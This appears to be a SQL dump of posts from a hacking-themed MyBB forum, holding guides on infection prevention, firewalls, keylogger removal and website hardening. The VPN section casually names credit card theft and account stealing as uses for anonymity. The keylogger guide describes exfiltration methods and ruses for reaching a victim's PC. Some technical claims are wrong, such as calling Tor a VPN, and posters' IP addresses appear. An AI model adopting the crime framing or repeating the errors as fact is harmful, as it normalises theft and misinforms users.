suspicious files in. [b]Availability[/b] [url=http://Sandboxie.com]The Sandboxie Website[/url] [u]6.3 VPN Software[/u] VPN software, or a Virtual Private Network, is a tool used to remain anonymous online. The importance of remaining undetectable was stressed above, which is why I’ve justified some leading VPN tools. A VPN assigns you an IP address from the VPN server itself. This means, you’re able to browse the Internet through a third-party IP address. This is useful for bypassing blocked websites and enhancing your anonymity when undergoing dangerous operations such as credit card thievery or account stealing. [u]6.3.1 Hotspot Shield[/u] Hotspot Shield is widely known as one of the leading VPN softwares. Hotspot Shield offers complete protection and anonymity when operating online. Hotspot Shield is extremely efficient and boasts a wide range of features including the capability to store your personal details securely, a fully functional antivirus feature, and compatibility on all Windows and Macintosh platforms. [b]Availability[/b] [url=http://hotspotshield.com]The Hotspot Shield Website[/url] [u]6.3.2 Tor[/u] Tor, much similar to Hotspot Shield, is another well-known VPN service. You’re assigned an IP address from a distributed network of relays located all over the world. Tor works for a variety of Internet facilities such as instant messaging services, web browsers, and many more applications. [b]Availability[/b] [url=http://www.torproject.org]The Tor Website[/url] [u]6.3.3 Loki[/u] Another VPN that is, arguably, in the top five VPN programs, is Loki. It offers all round efficiency with complete protection of personal details such as your IP address, FTP details, Internet passwords, browser history, and much more. [b]Availability[/b] [url=http://www.projectloki.com]The Loki Website[/url] [u]6.4 Online Proxies[/u] Similar to VPN services, proxies allows you to browse the Internet anonymously. They have the capability to circumvent implemented blocks at your location. Not only that, but a proxy can provide you with excellent security measures to help hide your online identity. Though proxies aren’t as powerful or as feature loaded as a VPN, they’re still an excellent alternative and allow for immediate web access. [u]8.4.1 HideMyAss[/u] HideMyAss is considered to be one of the top online proxies. It’s extremely efficient, and allows you to begin browsing immediately. [b]Availability[/b] [url=http://hidemyass.com]The HideMyAss Website[/url] [u]6.5 Antiviruses[/u] An antivirus program is perhaps the most important software one can have. Quality antiviruses provide almost complete protection ranging from website security, through to malware detection. If you’re a serious hacker or computing enthusiast, or would like to be, having an antivirus program is essential for prolonging the dynamism of your machine. [u]6.5.1 ESET NOD32[/u] ESET NOD32 antivirus is one of the better antivirus programs around. It regularly updates several times a day to the latest virus signature database and in tern, providing optimum protection. The ESET NOD32 antivirus provides online protection and also downloads protection. Simple, yet effective, the ESET NOD32 antivirus is indefinitely, extremely efficient software. [b]Availability[/b] [url=http://eset.com]The ESET Website[/url] [u]6.5.2 AVG[/u] AVG is one of the paramount antivirus softwares, with excellent protection. With a collection of unique features, AVG is definitely an antivirus to consider. It provides a Home Security version, and also a Business Security version. With features ranging from Link Scanner technology, through to Spam and Phisher prevention, AVG is categorically excellent software. [b]Availability[/b] [url=http://avg.com]The AVG Website[/url] [u]6.5.3 Avast[/u] Also considered to be in the top five antivirus programs, Avast offers complete protection and Internet security. Features such as Anti-rootkit and Anti-spyware capabilities, are reasons why Avast has had so much good feedback. With daily updates and resident shield technology, Avast is unarguably, one of the best antivirus programs available. [b]Availability[/b] [url=http://avast.com]The Avast Website[/url] [u]6.5.4 BitDefender[/u] With features ranging from real-time instant messaging and e-mail scanner technology, BitDefender is deemed to be one of the preeminent antivirus softwares. With a range of different versions, BitDefender has a package that’s right for you. Offering encryption services, BitDefender is hard to go past. [b]Availability[/b] [url=http://bitdefender.com]The BitDefender Website[/url] [u]6.5.5 Kaspersky[/u] Definitely one of the top five antivirus programs, Kaspersky is hard to surpass. Offering a wide range of versions from Home and Office to Business protection, Kaspersky has the flexibility to meet your personal needs. Another helpful feature that Kaspersky provides is Online Courses which are designed to teach about the way the Kaspersky Lab products work and how to implement them most efficiently. With colour-coding of unsafe links, Kaspersky Anti-Virus provides an adaptable interface suited to your personal needs. [b]Availability[/b] [url=http://Kaspersky.com]The Kaspersky Website[/url] [u]6.6 Firewalls[/u] A firewall is a basically a virtual wall that protects remote users from attacking your system. The main purpose is to prevent unwanted traffic that can be used to slow or danger your machine. Denial of Service attacks, sniffing, and network penetration can all be accounted for with the use of a simple firewall. [u]6.6.1 Windows Firewall[/u] The Windows Firewall is a built-in, host-based firewall included in Windows Vista and Windows XP (with Service Pack 2 and onwards). It offers well-rounded support and protection from any remote systems. Because the Windows Firewall is built-in software, commonsense would tell you that it isn’t compatible with Macintosh and Linux platforms. [b]Availability[/b] For Windows XP Users Without Service Pack 2 or Higher – [url=http://www.microsoft.com/downloads/details.aspx?FamilyID=4454e0e1-61fa-447a-bdcd-499f73a637d1&displaylang=en]The Microsoft Website[/url] [u]7.0 Conclusion[/u] Throughout this tutorial, the importance of preventing infection has been stressed through numerous ways. Remaining anonymous when online is one of the paramount focuses when undergoing online activity. So too, is inferring the potential threats a suspicious file may contain. Should you implement the above strategies and techniques, you’ve got a higher chance of preventing infection from occurring. Analysing and curing infections through the likes of the HiJackThis service and antivirus software are also important characteristic of a security alert user. The implementation of security tools is extremely important and is vital to the long life and efficiency of your system.', '41.174.16.25', '699273241', '0', '0', '0', '0', '1', 'b5225b3234cd17fc293d749e241bf049', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('148', '62', '0', '25', '[Guide]Firewalls', '0', '8', 'spacefish36', '1343947517', 'Table of Contents: [list][*]Basic information on firewalls [*]Types of firewalls [*]List of firewalls & information [*]Firewall tests [*]Credits [/list] [b][color=green][u]Section 1: Basic information on firewalls[/u][/color][/b] Firewalls play a central role in securing a PC, standing as a filter between the outside world and your computer. While there are several types of firewalls, the technology can be broadly defined as a collection of related security programs that are stored on a network gateway server and collectively safeguard network assets from users on other networks. While all firewalls run software, the firewall market is generally divided into these two categories: hardware and software. For the sake of this guide, I will only focus on the software firewalls. In its most basic form, a firewall basically filters incoming and outgoing packets. This means a firewall accepts or denies the connections based on user-defined rules. Firewalls are also used to monitor traffic from applications installed on your system, and based on the user defined rules, the traffic will either be allowed through or blocked. With these features, a firewall can be very useful in stopping hackers or malware in its tracks before anything malicious can happen. For example, a firewall can prevent connections from an outside hacker getting in, or it can deny outbound traffic of a trojan downloader trying to download malicious files. [b][color=green][u]Section 2: Types of firewalls[/u][/color][/b] There are a few different types of firewalls, but nowadays, most firewalls include all these features. [b]Packet-Filtering Firewalls[/b]: In its most basic form, a firewall does nothing but filter packets. This means that the firewall accepts or rejects IP packets on the basis of predefined rules. With packet filtering, the firewall carefully scrutinizes each packet\'s protocol and address information; content and context data are not considered. The main advantages of packet-filtering firewalls are their relative simplicity, low cost, and fast and easy deployment attributes. Software-only firewalls for home and small business are typically of this variety, including the firewall that is built in to more recent versions of Windows. [b]Circuit-Level Firewalls[/b]: This type of firewall doesn\'t simply accept or reject packets, it also decides whether a connection is valid according to a set of configurable rules. If everything checks out, the firewall opens a session and allows traffic to flow in only from the authenticated source. The traffic may also be permitted to proceed for only a limited period of time. In addition, the firewall may perform connection validation on the source IP address and/or port, the destination IP address and/or port, the protocol used, user IDs, passwords, the time of day or, most likely, several of these conditions. In addition, packet-level filtering may also take place. The big drawback to circuit-level firewalls is that they function at the transport layer and therefore may necessitate a significant modification of the transport-function programming. This can impact the performance or operation of a network. Also, circuit-level firewalls require more expertise to install and maintain. [b]Application-Level Firewalls[/b]: With this approach, the firewall acts as an application proxy, supplying all data exchanges with the remote system. The idea behind this concept is to make the server behind the firewall invisible to the remote system. An application-level firewall can accept or reject traffic based on a specific set of rules. The firewall may, for example, allow some commands to proceed to a server while rejecting others. The technology can also be used to restrict access to specified file types, as well as to provide different access levels to authenticated and nonauthenticated users. Application-level firewalls tend to be preferred by users who require detailed traffic monitoring and logging on the host, since the addition of these activities is relatively simple and doesn\'t further impact performance. IT administrators can set an application-level firewall to trigger alarms and notifications in the event that a predefined condition occurs. Application gateways are typically deployed on a separate network-connected computer, commonly called a proxy server [b]Stateful Multilevel Firewalls[/b]: Typically offered by vendors as \"best-of-breed\" solutions, this approach aims to combine the best attributes of multiple firewall types. Stateful multilevel firewalls are designed to perform network-level packet filtering while recognizing and processing application-level data. These firewalls often provide superior network protection but can be very expensive. [b][color=green][u]Section 3: List of firewalls & information[/u][/color][/b] There are several leading firewalls out there, but I\'ve compiled a list of the most commonly used ones here. Do note that these are standalone firewalls; I will not talk about the firewalls that come with security suites (eg. Kaspersky Internet Security comes with its own firewall; I will not talk about it here). [b]ZoneAlarm[/b]: [i]Quoted from CNET - ZoneAlarm is designed to protect your DSL- or cable-connected PC from hackers. This program includes four interlocking security services: a firewall, an application control, an Internet lock, and Zones. The firewall controls the door to your computer and allows only traffic you understand and initiate. The Internet lock blocks Internet traffic while your computer is unattended or while you\'re not using the Internet, and it can be activated automatically with your computer\'s screensaver or after a set period of inactivity. Zones monitor all activity on your computer and alert you when a new application attempts to access the Internet. Version 8.0.298 is Vista 64-bit compatible, improves performance during computer startup, shutdown and operation. [/i] ZoneAlarm is generally for users that are not computer savvy. It has many features, including a multilayered firewall, antivirus monitoring, application monitoring, and event logging. Download link: [url=http://www.zonealarm.com/security/en-us/anti-virus-spyware-free-download.htm]ZoneAlarm Free[/url] Screenshot: [img]http://images.snapfiles.com/screenfiles/zonealarm.gif[/img] [b] Online Armor[/b]: [i]Quoted from CNET - Online Armor Personal Firewall--Easy to use, award winning firewall. Online Armor is a powerful personal firewall, with HIPS and a host of other security features to keep your PC clear of infections and running smoothly. Online Armor is designed to be easy to use for beginners and offers powerful performance.[/i] Online Armor can generally be used by computer users of all levels. It is also considered as a HIPS program. Download link: [url=www.tallemu.com]Online Armor Personal Edition[/url] Screenshot: [img]http://images.betanews.com/screenshots/1124210905-1.jpg[/img] [b]Comodo Firewall[/b]: [i]Quoted from CNET - Comodo Firewall Pro is aimed to secure your system against internal attacks such as Trojan viruses / malicious software and external attacks by hackers. Safeguard your personal data through a simple user friendly single click interface offering full immunity to attack. Comodo Firewall Pro helps you connect in a secure way to the internet and global networks.[/i] Comodo Firewall has several more features, and is recommended for a computer savvy user who wants to fully customize his firewall rules and settings. It includes an antivirus, although it is not relied on as sole protection. An antivirus should be used with it. Version 3.9.76924.507 has stateful File Inspection for Realtime Virus Scanner and livePCSupport is provided as a 30 Day Trial. Download link: [url=www.personalfirewall.comodo.com]Comodo Firewall Pro[/url] Screenshot: [img]http://pcwin.com/media/images/screen/73890-comodo_firewall_pro.gif[/img] [b][color=green][u]Section 4: Firewall tests[/u][/color][/b] Now, if you want to test how secure your firewall is, there are a few sites offering firewall tests. [url=http://www.pcflank.com/]PC Flank tests[/url] [url=https://www.grc.com/x/ne.dll?bh0bkyd2]GRC - Shields Up![/url] [url=http://www.hackerwatch.org/probe/]McAfee - Test your firewall[/url] These are just basic tests for your firewall. [b][color=green][u]Credits[/u][/color][/b] Credits for the guide go to ITsecurity, myself, and Google of course :oui: I hope this helps. Safe surfing.', '41.174.16.25', '699273241', '0', '0', '0', '0', '1', '94990389899e0281438face9593aa2a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('149', '63', '0', '23', '[Guide] - Keylogger Information & Removal - [Guide]', '0', '12', 'jonas83', '1343948019', 'I should write up a tutorial on keyloggers and how to get rid of them as they are a popular tool for script kiddies that like to infect people and steal their passwords. [color=#FFD700][b]Notes:[/b][/color] I don\'t want to use quote boxes because I personally don\'t like reading off them. :tongue: [color=#32CD32][size=medium][b].::What is a keylogger::.[/b][/size][/color] Quoting Wikipedia: [b]Keystroke logging[/b] (often called [b]keylogging[/b]) is the practice of tracking (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored. There are numerous keylogging methods, ranging from hardware and software-based to electromagnetic and acoustic analysis. These are software programs designed to work on the target computer’s operating system. From a technical perspective there are five categories: [list] [*] [b]Hypervisor-based:[/b] The keylogger can theoretically reside in a malware hypervisor running underneath the operating system, which remains untouched. It effectively becomes a virtual machine. Blue Pill is a conceptual example. [*] [b]Kernel based:[/b] This method is difficult both to write and to combat. Such keyloggers reside at the kernel level and are thus difficult to detect, especially for user-mode applications. They are frequently implemented as rootkits that subvert the operating system kernel and gain unauthorized access to the hardware, making them very powerful. A keylogger using this method can act as a keyboard driver for example, and thus gain access to any information typed on the keyboard as it goes to the operating system. [*] [b]Hook based:[/b] Such keyloggers hook the keyboard using functionality provided by the operating system for applications to subscribe to keyboard events legitimately. The operating system notifies the keylogger each time a key is pressed and the keylogger simply records it. [*] [b]Passive Methods:[/b] Here the coder uses operating system APIs like GetAsyncKeyState(), GetForegroundWindow(), etc. to poll the state of the keyboard or to subscribe to keyboard events. These are the easiest to write, but where constant polling of each key is required, they can cause a noticeable increase in CPU usage and can miss the occasional key. An example would be found in Soul Collector\'s basic keylogger in Visual Basic tutorial. A more recent example simply polls the BIOS for preboot authentication PINs that have not been cleared from memory. [*] [b]Form Grabber based:[/b] Form Grabber-based keyloggers log web form submissions by recording the web browsing onSubmit event functions. This records form data before it is passed over the internet and bypasses https encryption.[/list] [color=#FFD700][b]Remote access software keyloggers[/b][/color] These are local software keyloggers programmed with an added feature to transmit recorded data from the target computer to a monitor at a remote location. Remote communication is facilitated by one of four methods:[list][*] Data is uploaded to a website, database or an FTP account. [*] Data is periodically emailed to a pre-defined email address. [*] Data is wirelessly transmitted by means of an attached hardware system. [*] The software enabling a remote monitor to log into the local machine via the internet or ethernet and access the logs stored on the target machine.[/list] [b]Wikipedia link: [/b] http://en.wikipedia.org/wiki/Keystroke_logging [b] A small guide on Keyloggers:[/b] http://www.actualspy.com/articles/keyloggers.html [color=#32CD32][size=medium][b].::How people spread keyloggers / How you may get infected by one::.[/b][/size][/color] [b] Complete Windows Trojan Paper:[/b] http://www.infosecwriters.com/texts.php?op=display&id=58 [i]Please jump to the \'[b]How Can I Get Infected?[/b]\' section[/i] Most common methods on how a person can get infected by a keylogger are: - [b]Via Attachments:[/b] I\'m always amazed how many people got themselves infected by an attachment, sent into their mailboxes. Most of these users are new to the Internet and are pretty naive. When they receive a mail,containing an attachment, saying they will get free p0rn, free Internet access etc., they run it without completely understanding the risks for their machines. Check the following scenario: you know your friend Alex is a very skilled Visual Basic programmer. You also know he\'s coding his latest program but you\'re curious what it is all about, and you wait for an e-mail from him with the attachment when he finishes coding the application. Yeah, but the person targeting YOU also knows that. The attacker also knows your friend\'s e-mail address. Then the attacker will simply code some program or get some freeware one, use some relaying mail server to fake the e-mail\'s FROM field and make it look like your friend\'s one; Alex\'s e-mail address is alex@example.com so the attacker\'s FROM field will be changed to alex@example.com and, of course, it will include the TROJANED attachment... You\'ll check your mail, see that Alex finally got his program ready and sent it, you\'ll download and run it without thinking that it might be a trojan or something else, because, hey, Alex wouldn\'t do something like that to me, he\'s my friend, and you\'ll get yourself infected. Information Is Power! Just because the attacker knew you were waiting for some particular file, he found Alex\'s e-mail address and got you infected... the right moment assumes importance here. And it all happened just because you were naive, just because you saw alex@example.com in the FROM field, and just because you didn\'t check the mail headers to see that the mail came from some .jp mail server relaying e-mails and, has been used from spammers for several months. Many people got themselves infected by the famous \"Microsoft Internet Explorer Update\" sent directly to their mailboxes, by the nonexistent Microsoft Updates Staff. I understand you felt great because Microsoft are paying attention especially to you, and sent you the latest updates, but these \"updates\" are definitely trojans. Microsoft will NEVER send you updates of their software via e-mail no matter you see the FROM field is updates@microsoft.com and as you\'ve noticed in the previous example the FROM field could and IS faked. If you ever notice some mail in your mailbox with subjects like \"Microsoft IE Update\" and such, delete WITHOUT viewing or reading the e-mail, because some E-Mail clients like Outlook Express and others, have bugs that automatically execute the file being attached in the e-mail WITHOUT you even touching it. As you can imagine this is a extremely dangerous problem that requires you to be always up to date with the latest version of any software you\'re using. - [b]Physical Access[/b] Physical access is vital for your computer\'s security. Imagine what can an attacker do while having physical access on your machine, and let\'s not mention if you\'re always connected to the Internet and leave the room for several minutes... long enough to get you infected. Here I\'ll point you several scenarios, often used by attackers to infect your computer while they\'re having physical access to your machine. There are some very smart people out there that keep thinking of new ways of getting physical access to someone\'s computer. Here are some tricks that are interesting: [list] [*] Your \"friend\" wants to infect you with a trojan and he/she has physical access to your machine. Let\'s say you were at home surfing the net, chatting or whatever. Suddenly your \"friend\" asks you for a glass of water, knowing that you\'ll go in another room and will be away for 1 or 2 minutes. While you do that he/she takes out a diskette of the pocket and infects your unprotected PC. You came back and everything is OK because your \"friend\" is doing exactly the same thing before you left ...surfing the net.[/list] [list] [*] The next example is when 2 guys want to take revenge on you cause of something and are supporting each other to accomplish the task. Again you are at home with your \"friend\", surfing, chatting, whatever you\'re doing; suddenly the telephone rings and a \"friend\" of yours wants to speak with you for something that is really important. He/she (it\'s better to be she in this case) asks \"Is there anyone around you? If so,please move somewhere away from him/her(after knowing it is him or her,of course). I don\'t want anyone to listen what I\'m going to tell you\". The slave is again lured away from the computer, leaving the attacker to do whatever he/she wants on the target computer.[/list] [list] [*] Other approaches like the previous ones might be sudden ring on the bell, as well as other variations of phone calls and conversations leaving the attacker alone with the slave\'s computer. There are so many other possible approaches; just think for a while and you\'ll see what I mean and how easily you could be tricked, and it\'s because you\'re not suspicious enough when it is about your sensitive computer data.[/list] - [b]Fake Programs[/b] It is surprising a lot of people fall for fake programs. Fake programs can be of all sorts. [list] [*] Key-gens [*] Web Messengers [*] Cracks [*] Installation files for games [*] Almost everything with a \'.exe\' extension can be a fake program. [/list] Fake programs aren\'t the actual logger, the logger server may be binded with the fake program using binders, found around the web for free. Fake programs are dangerous as merely running them will automatically execute the program it is binded with. So, to know if what you downloaded is a fake program, check for the following: [list][*]Is the vendor trusted? [*]Are there any positive comments and feedback by downloaders (note: the person posting might have acquaintances ready to post fake replies.) [*]Check for a few negative feedback (if any) to understand if the program works or not. [*]Are there any screenshots provided? Screenshots are very useful to detect a programs believability. If the screenshot looks legitimate, the program MIGHT be trusted (many people make their fake programs believable and attractive nowadays) [*]Virus scans. Note if there are any virus scans present. Virus scans can be faked, so it is recommended that you scan yourself in VirusTotal.[/list] If you don\'t trust a program, run it on VMware or Sandboxie. [b]VMware:[/b] (Recommended) http://www.vmware.com/ [b] Sandboxie:[/b] (note, some keyloggers are coded to bypass sandboxie to infect your system. It is recommended to use VMWare.) http://www.sandboxie.com/ If you see a fake program posted here, report it. [color=#32CD32][size=medium][b].::Symptoms of keylogger\'s presence::.[/b][/size][/color] There can be various types of symptoms of a keylogger infection. Sometimes not all of these are noticed. It all depends on the type of keyloggers used. Here are some symptoms that might occur (please suggest more via replies to keep the symptoms updated.):[list] [*]You try to log into your e-mail/facebook account and see the \"Invalid Password\" error. You try to enter your password multiple times, but no success [*]Your friends mention that they have received messages from your address which you know you did not send. [*]Some keyloggers (mostly the keyloggers found here) contain an anti\'s function, meaning that it will kill your anti-virus process upon execution. So, you might notice your anti-virus software not working properly. [b]NOTE:[/b] Some keyloggers add themselves to startup, therefore they execute on startup and only kill the AV process during startup. This is good for us as we can run the AV again after startup. This is only true for poorly coded or poorly tested keyloggers. Advanced keyloggers kill the AV process when the AV is run. [*]You receive notification from your firewall that some applications have attempted to connect to the Internet, although you did not initiate this. This could be a keylogger trying to send information to it\'s master/spreader/creator. [*]Unknown processes in [b]Task Manager.[/b] [*][i]Unhandled Exception[/i] errors. (Visual Basic Keyloggers) [/list] These symptoms usually mean a keylogger infection. Might also mean a trojan infection, but I won\'t go into that. Look into Valiant\'s guide on trojans for more information on trojans. [color=#32CD32][size=medium][b].::If infected::.[/b][/size][/color] If you seem to notice the symptoms listed above and think you are infected by a keylogger, do not panic. Panicking will lead to amateur actions which might damage your security further. Follow the steps provided. [b]Disconnect you infected computer from the Internet.[/b] Keyloggers usually send information via the Internet using e-mails and FTP uploading. Therefore disconnecting the computer from the Internet will secure the accounts you haven\'t yet lost. NOTE: All downloads of anti-spywares and anti-keyloggers must be done in another computer. A spare PC, school computer, office computer, friends computer, Local Internet Cafe, etc. should be used to download the softwares necessary for the removal of your infection. [b]Recovering you accounts:[/b] The accounts you have lost can be recovered using the recovery question or \'Forgot my password\' page. Please recover your accounts using spare PC, school computer, office computer, friends computer, Local Internet Cafe, etc. NOT the infected computer. [b]Anti-Keyloggers:[/b] I would recommend using an anti-keylogger, if you decide not to keep your computer disconnected from the internet. Download [url=http://download.cnet.com/KeyScrambler-Personal/3000-2144_4-10571274.html][color=#00BFFF][b]KeyScrambler Personal[/b][/color][/url]: [color=#FFD700]KeyScrambler Personal is a free plug-in for your Web browser that protects everything you type from keyloggers. It defeats keyloggers by encrypting your keystrokes at the keyboard driver level, deep within the operating system. When the encrypted keystrokes reach your browser, KeyScrambler then decrypts them so you see exactly the keys you\'ve typed. Keyloggers can only record the encrypted keys, which are completely indecipherable. Unlike anti-virus and anti-spyware programs that depend on recognition to remove keyloggers that they know about, KeyScrambler will protect you from both known and unknown keyloggers. What\'s more, KeyScrambler provides protection without getting in your way. You don\'t have anything to learn about the program and you don\'t have to do anything differently, but with KeyScrambler your important personal information will be a whole lot safer.[/color] Basically it is a software that encrypts your keystrokes so that the logs of a keylogger would be unreadable. [color=#32CD32][b].::Removing the infections::.[/b][/color] A good antispyware software should detect the infection. Therefore, perform the following: [spoiler][color=#00BFFF][u][b]MalwareBytes Anti-Malware[/b][/u][/color] [list] [*][url=http://www.malwarebytes.org/mbam.php][color=#FFA500][b]Download Malwarebytes\' Anti-Malware[/b][/color][/url] - Please use this link to avoid downloading incorrect and potentially harmful software. [/list] [color=#FFA500][b]Please execute the following instructions:[/b][/color] [list] [*]Double-click the \'[b]mbam-setup.exe[/b]\' file to install this application. [*]Ensure a check mark is placed in the radio box next to \'[b]Update Malwarebytes\' Anti-Malware[/b]\' and please also make sure that there is a check mark in the radio box next to \'[b]Launch Malwarebytes\' Anti-Malware[/b]\' [*]Click \'[b]Finish[/b]\' [list][*][i][u]Note[/u]: If an update is found, it will download and install the latest version. Please do not interrupt this process.[/i][/list] [*]Once the program has loaded, please ensure a check mark is placed in the radio box next to \'[b]Perform Full Scan[/b]\' (not Perform Quick Scan) and proceed by clicking on \'[b]Scan[/b]\'. [list][*][i][u]Note[/u]: The scan may take some time, so please be patient and wait for it to finish. [b] Please stop all current downloads while your scan is in progress, as this may corrupt the results.[/b][/i][/list] [*]When the scan is complete, click \'[b]OK[/b]\' and then click \'[b]Show Results[/b]\' to view the results. [*]Make sure that everything is checked, and proceed by clicking \'[b]Remove Selected[/b]\' [*]Once disinfection is completed, a log will open in Notepad and you may be prompted to restart your machine. If you are asked to restart, please do so. [list][*][i][u]Note[/u]: The log is automatically saved by Malwarebytes\' Anti-Malware and can be viewed by clicking on the \'[b]Logs[/b]\' tab in the main interface.[/i][/list] [/list][/spoiler] [spoiler][color=#00BFFF][u][b]SUPERAntiSpyware[/b][/u][/color] I\'d like to recommend that you download an application known as [url=http://www.superantispyware.com/downloadfile.html?productid=SUPERANTISPYWAREFREE][color=#1E90FF][b]SUPERAntiSpyware[/b][/color][/url]. We use this tool to test for any spyware that may be present on your machine. Details on how to operate this application are given below. [color=#FFA500][b]Please execute the following instructions:[/b][/color] [list] [*][b][url=http://www.superantispyware.com/downloadfile.html?productid=SUPERANTISPYWAREFREE][color=#1E90FF]Download SUPERAntiSpyware[/color][/url][/b] - Please use this link and this link only. This is advised as it limits the chances of you downloading incorrect and potentially harmful software. [*]Run the installer (SUPERAntiSpyware Free Edition Setup). [*]SUPERAntiSpyware will ask you if you would like to check for the latest rules and definition updates. Select \'[b]Yes[/b]\'. [*]You will now be presented with the SUPERAntiSpyware Setup Wizard. Follow the prompts (by pressing Next). [list][*]In one of the steps, it\'ll ask you if you\'d like to send a Diagostic Report to the SUPERAntiSpyware research center. If you opt to do this, it will take up to five minutes before you can proceed with the setup. This is not a necessary step, though it\'s recommended, as it will help with the worldwide anti-malware command. [/list][*]Once you\'ve finished with the Setup process, the SUPERAntiSpyware interface will open. [*]Please choose the \'[b]Check for Updates...[/b]\' option. [*]Once this process has completed, please select the \'[b]Scan your Computer...[/b]\' option. [*]Ensure that [b]all the drives are checked[/b] and then proceed by checking the \'[b]Perform Complete Scan[/b]\' option. Press Next. [*]SUPERAntiSpyware will begin scanning your system for spyware. It\'s important that you allow it to do this without any interruptions. [list][*]Please make sure that you don\'t install any new applications whilst the scan is in process.[/list] [*]Once the scan has completed, you\'ll be presented with an interface detailing what the scan has found. Press \'[b]Okay[/b]\' and on the main interface ensure that any threats have been checked. Continue by pressing \'[b]Next[/b]\'. [*]The threats will now be quarantined. Press \'[b]Finish[/b]\'. [/list][/spoiler] [spoiler][color=#00BFFF][u][b]ESET Online Scanner[/b][/u][/color] Scan your PC using [url=http://www.eset.com/onlinescan][color=#1E90FF][b]ESET Online Scanner[/b][/color][/url] http://www.eset.com/onlinescan [list][*]Go to the ESET link using Internet Explorer to run the scanner through your browser (other browsers require you to download) [*]The process is easy, just use the default settings and proceed to the scan [*]It will automatically update it\'s databases. (If you are using for the second (or later) time, update process maybe faster) [*]After scan is complete, remove all infections and click \"Finish\" [*]Finally, close the browser window. [/list] [b]IMPORTANT:[/b] Administrator privileges are required to run ESET Online Scanner.[/spoiler] [color=#32CD32][b]If no infections are found:[/b][/color] If no infections are found, there can be two possible explanations. [b]1. The keylogger is FUD:[/b] FUD means Fully Undetectable/Undetected. This means that no anti-virus can detect the infection. If true, don\'t panic, there is still one solution: [list] [*] Download [url=http://www.trendsecure.com/portal/en-US/threat_analytics/hijackthis.php][color=#00BFFF][b]HijackThis from TrendMicro[/b][/color][/url]. [*] Install it and run it. [*] Click [b]Do a system scan and save log file[/b] [*] When the Notepad pops up, copy and paste the contents of the log into a new thread that you make on L33THacking ( to be more specific, In the HJT Logs Analysis Section). Title the thread [HJT log][your problem]. [list][*] An example of such a thread would be:[/list] [*] [i]Do [color=#FF4500]NOT[/color] fix anything it finds there yet, as most of the entries listed in the log are legit and necessary for a smooth and stable running of your system.[/i] [*] Do not download or install any new software as it will hinder the analysis of your log.[/list] This makes it easier on the HJT Team to identify people who are in need of help. Once a helper has jumped into the thread, do [color=#FF0000]NOT[/color] post until the helper has given the ALL CLEAN or cannot help the user, as incorrect and/or amateur actions can damage your computer even more. [b]2. You aren\'t infected:[/b] You are in luck. You aren\'t infected by a keylogger. This can be true if a few of your symptoms aren\'t met. If you still see the symptoms, then the situation is probably Number 1.', '41.174.6.147', '699270803', '0', '0', '0', '0', '1', '633b1f3e42d57b738ad46ec46feea56c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('150', '61', '147', '23', 'RE: [Tutorial] Prevention of Infection', '0', '5', 'Timmy', '1343948116', 'Nice tutorial on prevention of viruses etc. Thanks', '41.174.6.147', '699270803', '1', '0', '0', '0', '1', '9f5ba23855723a8cb0ccdf3bcbc72e7f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('151', '64', '0', '23', 'Securing your website', '0', '5', 'Timmy', '1343948298', '[size=large][b]Seven Ways to Protect Your Website From Hackers[/b][/size] Those of us who are hackers would be offended by the article\'s title. Hackers are ethical testers to find faults in systems so they can be corrected before unethical hackers (crackers) exploit them. So, this articles is really about how to protect your website from crackers. [b][color=#A9A9A9][u]Keep your files up to date[/u][/color][/b]. If your site uses the popular SendMail script, please be sure your version is a current one. Visit [url=http://www.sendmail.org/support/antispam]Anti-Spam Provisions in Sendmail 8.8[/url] to edit the FormMail script. We have the updated SendMail in use for the Harley Shopping Cart site. FormMail is another popular script used to send form results to an email address or database. We use that file for our website form. These scripts are located in the cgi-bin on the web host server. Signing up for updates for scripts (programs) your site uses will let you know if there are any. You should use the latest update to protect yourself. This is often the reason the update is released. If you are unsure of the scripts used on your website, contact your web developer. [b][color=#A9A9A9][u]Remove unnecessary files[/u][/color][/b].s your website changes, old files are ignored. They should be removed. Keep copies offline in case you wish to add them again, but remember to update any scripts. Old files are often indexed by search engines. So even if you do not link to those pages anymore, the search engines lists them for Internet users to find and visit. Automated programs to search for these files can find them to exploit them. [b][color=#A9A9A9][u]Implement passwords[/u][/color][/b].Any sensitive files, databases or scripts should be protected. Please use passwords that are difficult to guess. Use letters AND numbers, but be careful to keep the number of characters within the programmed limits and remember that passwords are case-sensitive. [b][color=#A9A9A9][u]Include robots.txt[/u][/color][/b] .Create a file to tell search engines not to index files that are restricted to certain users. You can also disallow indexing of images, so people who search for images to use illegal do not steal your images. [b][color=#A9A9A9][u]Check permissions of uploaded file[/u][/color][/b]s . Left-click each filename in your web host server, then right-click and select CHMOD to make sure files are set to the proper permissions. Check with your web host if you are unsure. Remember to upload images as binary and most other files as ASCII files. Choosing Auto for automatic selection may be incorrect if certain extensions are not specified. [b][u][color=#A9A9A9]Protect email addresses[/color][/u][/b] . If you ever got a strange email that tested your form or simply sent you an email to yourself, one of those spammer programs found your email address from your website or someone else\'s. There are scripts to split up your email address, so spammer software programs cannot read them. Another way is to place your email address in an image or simply have an \"[i][u]Email us[/u][/i]\" link. I haven\'t done this, but I didn\'t have any problems until recently. I still want to make my contact information visible to my target audience. If you sign guestbooks, go to forums or newsgroups, or share your email address with anyone else, your email address can be posted and shared all over the Internet. I often use several email addresses when making posts, because spammers look there first for email addresses. To spammers, a guestbook is an email address database. So use a Hotmail account for your email, but you can still include your web address in your signature. If the 